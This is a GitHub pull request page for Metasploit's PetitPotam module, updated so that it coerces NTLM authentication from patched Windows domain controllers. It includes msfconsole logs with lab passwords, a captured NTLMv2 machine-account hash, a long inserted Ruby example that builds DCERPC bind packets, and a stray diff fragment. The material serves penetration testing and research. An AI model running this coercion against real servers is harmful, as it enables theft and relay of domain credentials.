
Update PetitPotam For New Windows Servers #18622

Merged
merged 4 commits into from
Dec 15, 2023

Conversation

zeroSteiner
Contributor

This makes an update to the PetitPotam module to enable it to target patched Windows Servers when provided the necessary authentication information. At some point between Windows Server build 10.0.17763.107 and 10.0.17763.3232 a change was made which required not only the SMB connection to be authenticated but also the inner DCERPC connection. The inner DCERPC connection must use RPC_C_AUTHN_LEVEL_PKT_PRIVACY and RPC_C_AUTHN_WINNT to target these newer servers. To accommodate this, the PetitPotam module was switched to using RubySMB's DCERPC connection for named pipes, which supports this authentication.

There are no changes necessary from a user perspective; the module will simply work now when targeting these newer servers.

Requires changes from:

Verification

  • Install a Windows Server Domain Controller with recent patches
  • Create a user account, no special privileges should be necessary
  • Start msfconsole
  • Run the petitpotam module with the credentials from the previous step
  • See that the module works, returning ERROR_BAD_NETPATH instead of ERROR_ACCESS_DENIED

New and working

```
msf6 auxiliary(scanner/dcerpc/petitpotam) > show options

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   LISTENER   192.168.159.11   yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       efsrpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  MSFLAB           no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.10:445    - Binding to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Bound to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```

Old and broken

```
msf6 auxiliary(scanner/dcerpc/petitpotam) > show options

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   192.168.159.11   yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       efsrpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  MSFLAB           no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.10:445    - Binding to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Bound to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcDecryptFileSrv
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcQueryUsersOnFile
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcQueryRecoveryAgents
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```

Newer versions of Windows require the inner DCERPC connection to also be
authenticated. The prior version of the petitpotam module used Rex and
did not provide this authentication. Switching to RubySMB exposes this
functionality and allows the module to work on the latest versions of
Windows.
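The PR description and the commit message both turn on one detail: whether the bind PDU sent over the named pipe carries a sec_trailer selecting NTLM (RPC_C_AUTHN_WINNT) at packet privacy (RPC_C_AUTHN_LEVEL_PKT_PRIVACY). The following is an added example, not code from this PR, from Metasploit or from RubySMB. It builds a minimal MS-RPCE bind PDU for the EFSRPC interface shown in the module output, with or without a sec_trailer, and parses a PDU back to report what the inner DCERPC connection negotiates, which is what a defender inspecting a capture of \efsrpc pipe traffic would look for. Assumptions: the wire constants are the MS-RPCE values; the NTLMSSP token is a constructed placeholder rather than a real NEGOTIATE message; and `accepted_by_patched_server?` only models the behaviour the PR describes (old-style unauthenticated inner bind rejected, NTLM at PKT_PRIVACY accepted), not the actual server-side logic.

```ruby
# Added example (not Metasploit or RubySMB code): build a minimal MS-RPCE bind
# PDU (common header, p_context_elem, optional sec_trailer) and parse the
# authentication settings back out of any PDU.

# MS-RPCE authentication service and level constants (wire values).
RPC_C_AUTHN_WINNT               = 10  # NTLMSSP
RPC_C_AUTHN_LEVEL_CONNECT       = 2
RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
RPC_C_AUTHN_LEVEL_PKT_PRIVACY   = 6
AUTH_LEVEL_NAMES = {
  RPC_C_AUTHN_LEVEL_CONNECT       => 'RPC_C_AUTHN_LEVEL_CONNECT',
  RPC_C_AUTHN_LEVEL_PKT_INTEGRITY => 'RPC_C_AUTHN_LEVEL_PKT_INTEGRITY',
  RPC_C_AUTHN_LEVEL_PKT_PRIVACY   => 'RPC_C_AUTHN_LEVEL_PKT_PRIVACY'
}.freeze

PTYPE_BIND     = 11
PFC_FIRST_LAST = 0x03
EFSRPC_UUID = 'df1941c5-fe89-4e79-bf10-463657acf44d' # interface UUID from the module output
NDR_SYNTAX  = '8a885d04-1ceb-11c9-9fe8-08002b104860' # NDR transfer syntax, version 2.0

# DCERPC sends the first three UUID fields little-endian and the last two as raw bytes.
def pack_uuid(uuid)
  a, b, c, d, e = uuid.split('-')
  [a.hex, b.hex, c.hex].pack('Vvv') + [d + e].pack('H*')
end

# Build a bind PDU for EFSRPC v1.0. With auth: nil there is no sec_trailer,
# i.e. the inner connection is unauthenticated, as the module sent it before this PR.
def build_bind(auth: nil, call_id: 1)
  context = [0, 1, 0].pack('vCC') +                       # p_cont_id, n_transfer_syn, reserved
            pack_uuid(EFSRPC_UUID) + [1, 0].pack('vv') +   # abstract syntax, version 1.0
            pack_uuid(NDR_SYNTAX) + [2, 0].pack('vv')      # transfer syntax, version 2.0
  body = [4280, 4280, 0, 1].pack('vvVC') + "\x00" * 3 + context # max frags, assoc group, n_context_elem

  auth_value = ''.b
  trailer = ''.b
  if auth
    auth_value = "NTLMSSP\x00".b + [1].pack('V') # constructed stand-in for an NTLM NEGOTIATE token
    # sec_trailer: auth_type, auth_level, auth_pad_length, auth_reserved, auth_context_id
    trailer = [auth[:type], auth[:level], 0, 0, 0].pack('CCCCV')
  end

  frag_length = 16 + body.bytesize + trailer.bytesize + auth_value.bytesize
  # rpc_vers, rpc_vers_minor, ptype, pfc_flags, packed_drep (LE/ASCII/IEEE), frag_length, auth_length, call_id
  header = [5, 0, PTYPE_BIND, PFC_FIRST_LAST, 0x10, 0, 0, 0,
            frag_length, auth_value.bytesize, call_id].pack('C8vvV')
  header + body + trailer + auth_value
end

# Parse the common header and, when auth_length is non-zero, the sec_trailer that
# sits 8 bytes before the auth_value at the end of the fragment. Returns nil when
# the PDU carries no authentication at all.
def inner_auth(pdu)
  raise ArgumentError, 'short PDU' if pdu.bytesize < 16
  frag_length, auth_length = pdu.byteslice(8, 4).unpack('vv')
  raise ArgumentError, 'frag_length does not match PDU size' unless frag_length == pdu.bytesize
  return nil if auth_length.zero?
  trailer_off = frag_length - auth_length - 8
  raise ArgumentError, 'auth_length overlaps the header' if trailer_off < 16
  auth_type, auth_level, pad_len, _reserved, ctx = pdu.byteslice(trailer_off, 8).unpack('CCCCV')
  { type: auth_type, level: auth_level, pad: pad_len, context_id: ctx }
end

# Model of the behaviour the PR describes for patched servers: the inner DCERPC
# connection is accepted only when it is NTLM-authenticated at packet privacy.
def accepted_by_patched_server?(pdu)
  auth = inner_auth(pdu)
  !auth.nil? && auth[:type] == RPC_C_AUTHN_WINNT && auth[:level] == RPC_C_AUTHN_LEVEL_PKT_PRIVACY
end

def describe(pdu)
  auth = inner_auth(pdu)
  return 'inner DCERPC connection unauthenticated (no sec_trailer)' unless auth
  level = AUTH_LEVEL_NAMES.fetch(auth[:level], "level #{auth[:level]}")
  "auth_type #{auth[:type]} at #{level}"
end

if $PROGRAM_NAME == __FILE__
  old_style = build_bind
  new_style = build_bind(auth: { type: RPC_C_AUTHN_WINNT, level: RPC_C_AUTHN_LEVEL_PKT_PRIVACY })
  [old_style, new_style].each do |pdu|
    verdict = accepted_by_patched_server?(pdu) ? 'accepted' : 'rejected (ERROR_ACCESS_DENIED in the module output)'
    puts "#{describe(pdu)} -> #{verdict}"
  end
end
```

Running it prints the unauthenticated bind as rejected and the NTLM/PKT_PRIVACY bind as accepted. `inner_auth` works on any PDU type, not just bind, because the sec_trailer position is derived from the common header's frag_length and auth_length alone.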
handle_args[:uuid],
# rename tree_file
@pipe = tree.open_file(filename: handle_args[:filename], write: true, read: true)
handle = dcerpc_handle(
Contributor Author

Technically this handle isn't used for anything but printing stats information anymore. IMHO the verbosity with which it prints the endpoint and the UUID is extremely helpful in this scenario because the nature of the attack uses uncommon UUID and endpoint combinations. For that reason, I opted to keep this output.

@adfoster-r7
Contributor

Works for me 👍

```
msf6 auxiliary(scanner/dcerpc/petitpotam) > run rhost=192.168.123.141 username=administrator password=p4$$w0rd7 listener=192.168.123.1

[*] 192.168.123.141:445   - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.123.141[\lsarpc] ...
[*] 192.168.123.141:445   - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.123.141[\lsarpc] ...
[*] 192.168.123.141:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.13
[SMB] NTLMv2-SSP Username   : ADF3\DC3$
[SMB] NTLMv2-SSP Hash       : DC3$::ADF3:8c988579fd463ef4:c2081cddd8442dc8c160f5709ff9b11e:010100000000000080fa11f8832fda01ac0f317f3cadb094000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080fa11f8832fda0106000400020000000800300030000000000000000000000000400000bda53062b69a3501947c650292069d6883377d638b3d4360233b820c68f9ff280a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[+] 192.168.123.141:445   - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.123.141:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/dcerpc/petitpotam) >
```

It'd be cool to update these docs https://github.com/rapid7/metasploit-framework/blob/b019b2ff89bb66984560366d97a9722be5c1634f/documentation/modules/auxiliary/scanner/dcerpc/petitpotam.md to recommend using the auxiliary/server/capture/smb module or similar but LGTM

@adfoster-r7 adfoster-r7 merged commit c1186be into rapid7:master Dec 15, 2023
57 checks passed
@adfoster-r7
Contributor

Release Notes

Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases

@zgoldman-r7 zgoldman-r7 added rn-fix release notes fix rn-enhancement release notes enhancement and removed rn-fix release notes fix labels Dec 21, 2023